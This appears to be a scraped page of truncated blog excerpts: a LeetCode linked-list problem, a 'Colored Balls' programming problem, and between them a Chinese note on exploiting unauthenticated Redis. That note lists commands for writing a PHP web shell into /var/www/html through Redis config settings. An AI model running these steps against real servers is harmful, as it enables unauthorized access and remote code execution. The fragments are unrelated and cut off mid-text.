203. 移除链表元素
题目
给你一个链表的头节点 head 和一个整数 val ,请你删除链表中所有满足 Node.val val 的节点,并返回 新的头节点 。
输入:head [1,2,6,3,4,5,6], val 6
输出:[1,2,3,4,5]示例 2:
输入&…
未授权
可以利用超级弱口令工具来判断redis是否能未授权登录 telnet
#尝试登录info
#查看redis信息 RCE方法
写shell
需要写权限需要知道web网站路径
config set dir /var/www/html
config set dbfilename redis.php
set test "<?php phpinfo(); ?>"
sa…
Colored Balls
题目描述
There are balls of n n n different colors; the number of balls of the i i i-th color is a i a_i ai.
The balls can be combined into groups. Each group should contain at most 2 2 2 balls, and no more than 1 1 1 ball of each c…